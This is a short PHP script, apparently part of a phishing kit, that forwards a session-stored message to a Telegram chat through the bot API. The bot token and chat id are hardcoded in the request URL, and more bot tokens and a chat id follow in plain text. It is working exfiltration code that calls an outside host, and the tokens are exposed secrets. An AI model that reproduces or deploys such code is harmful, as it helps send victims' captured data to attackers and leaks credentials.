<?php 
if(isset($_SESSION['msg'])) $message = $_SESSION['msg'];
else $message = "non";
   file_get_contents("https://api.telegram.org/bot8012491278:AAF7MzFrQQDkJ5fq11Wdg1tuxliDESfyM0o/sendMessage?chat_id=-1002407037762&text=" .urlencode($message)."&parse_mode=html" );
?>


// 5136998272:AAEZlIP0u3SqeVgCaTrXu0p7pwfYDbNndb0

5136998272:AAEZlIP0u3SqeVgCaTrXu0p7pwfYDbNndb0

1001749471781